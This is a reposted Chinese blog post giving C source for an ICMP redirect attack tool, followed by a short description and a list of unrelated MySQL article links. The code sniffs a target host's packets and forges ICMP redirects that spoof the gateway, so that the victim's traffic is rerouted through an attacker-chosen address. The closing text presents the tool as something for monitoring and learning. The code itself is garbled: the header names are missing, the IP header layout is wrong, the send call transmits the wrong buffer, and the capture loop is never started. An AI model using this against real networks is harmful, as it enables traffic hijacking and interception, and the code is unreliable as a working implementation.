博客
关于我
信息安全-ICMP重定向攻击实现代码
阅读量:788 次
发布时间:2019-03-25

本文共 3694 字,大约阅读时间需要 12 分钟。

#include 
#include
#include
#include
#include
#include
#include
#define MAX 1024 #define SIZE_ETHERNET 14 char *TARGET_IP; char *REDIRECT_IP; char *GW_IP; struct sockaddr_in target_ip, restrict_ip, gw_ip; struct ip_header { uint8_t version; uint8_t header_length; uint8_t tos; uint8_t total_length; uint16_t id; uint16_t frag_off; uint8_t ttl; uint8_t protocol; uint16_t checksum; struct in_addr source_address; struct in_addr destination_address; }; struct icmp_header { uint8_t type; uint8_t code; uint16_t checksum; struct in_addr gateway_addr; }; uint16_t checksum(uint8_t *buf, int len) { uint32_t sum = 0; uint16_t *cbuf = (uint16_t *)buf; while (len > 1) { sum += *cbuf++; len -= 2; } if (len) { sum += *(uint8_t *)cbuf; } sum = (sum >> 16) + (sum & 0xffff); return ~sum; } void icmp_redirect(int sockfd, const unsigned char *data, int datalen) { struct sockaddr_in dest; struct packet { struct ip_header iph; struct icmp_header icmph; char data[28]; } packet; packet.iph.version = 4; packet.iph.header_length = 5; packet.iph.tos = 0; packet.iph.total_length = htons(56); packet.iph.frag_off = 0; packet.iph.ttl = 255; packet.iph.protocol = IPPROTO_ICMP; packet.iph.checksum = 0; packet.iph.source_address = gw_ip.sin_addr; packet.iph.destination_address = target_ip.sin_addr; packet.icmph.type = ICMP_REDIRECT; packet.icmph.code = ICMP_REDIRECT_HOST; packet.icmph.checksum = 0; packet.icmph.gateway_addr = restrict_ip.sin_addr; memcpy(packet.data, data + SIZE_ETHERNET, 28); packet.iph.checksum = checksum((uint8_t *)&packet.iph, sizeof(packet.iph)); packet.icmph.checksum = checksum((uint8_t *)&packet.icmph, sizeof(packet.icmph) + 28); dest.sin_family = AF_INET; dest.sin_addr = target_ip.sin_addr; sendto(sockfd, (const struct sockaddr *)&dest, sizeof(dest), 0, (const struct sockaddr *)&dest, sizeof(dest)); printf("Redirect packets have been sent....\n\n"); } void getPacket(u_char *args, const struct pcap_pkthdr *pkthdr, const u_char *packet) { int sockfd, res; int one = 1; int *ptr_one = &one; if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) { printf("Error creating socket\n"); return; } res = setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, ptr_one, sizeof(one)); if (res < 0) { printf("Error setting socket options\n"); return; } icmp_redirect(sockfd, packet, 0); } void setup_sniffer(char *dev) { char errbuf[PCAP_ERRBUF_SIZE]; bpf_u_int32 mask, net; if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) { net = 0; mask = 0; } pcap_t *device = pcap_open_live(dev, 65535, 1, 0, errbuf); if (device == NULL) { printf("Error opening device\n"); return; } struct bpf_program filter; char filterstr[50] = {0}; sprintf(filterstr, "src host %s", inet_ntoa(target_ip.sin_addr)); if (pcap_compile(device, &filter, filterstr, 1, net) == -1) { printf("Error compiling filter\n"); return; } pcap_setfilter(device, &filter); printf("Sniffing at %s....\n\n", TARGET_IP); } int main(int argc, const char *argv) { if (argc != 5) { printf("Usage: %s target_ip redirect_ip gateway_ip sniff_dev\n", argv[0]); return 1; } if (inet_aton(argv[1], &target_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[1]); return 1; } if (inet_aton(argv[2], &restrict_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[2]); return 1; } if (inet_aton(argv[3], &gw_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[3]); return 1; } char *dev = argv[4]; printf("Target: %s\nRedirect: %s\nGW: %s\nDevice: %s\n\n", TARGET_IP, REDIRECT_IP, GW_IP, dev); setup_sniffer(dev); }

以上代码实现了一个网络嗅探和ICMP重定向的工具,主要功能包括:

  • 捕获目标网络上的数据包
  • 构造并发送带有ICMP重定向指令的伪造包
  • 使用pcap库进行网络嗅探和数据包分析
  • 该工具可以用来进行网络流量监控和调试,适用于需要理解网络数据包结构和协议的开发和学习。

    转载地址:http://qwbuk.baihongyu.com/

    你可能感兴趣的文章
    mysql 数据库存储引擎怎么选择?快来看看性能测试吧
    查看>>
    MySQL 数据库操作指南:学习如何使用 Python 进行增删改查操作
    查看>>
    MySQL 数据库的高可用性分析
    查看>>
    MySQL 数据库设计总结
    查看>>
    Mysql 数据库重置ID排序
    查看>>
    Mysql 数据类型一日期
    查看>>
    MySQL 数据类型和属性
    查看>>
    mysql 敲错命令 想取消怎么办?
    查看>>
    Mysql 整形列的字节与存储范围
    查看>>
    mysql 断电数据损坏,无法启动
    查看>>
    MySQL 日期时间类型的选择
    查看>>
    Mysql 时间操作(当天,昨天,7天,30天,半年,全年,季度)
    查看>>
    MySQL 是如何加锁的?
    查看>>
    MySQL 是怎样运行的 - InnoDB数据页结构
    查看>>
    mysql 更新子表_mysql 在update中实现子查询的方式
    查看>>
    MySQL 有什么优点?
    查看>>
    mysql 权限整理记录
    查看>>
    mysql 权限登录问题:ERROR 1045 (28000): Access denied for user ‘root‘@‘localhost‘ (using password: YES)
    查看>>
    MYSQL 查看最大连接数和修改最大连接数
    查看>>
    MySQL 查看有哪些表
    查看>>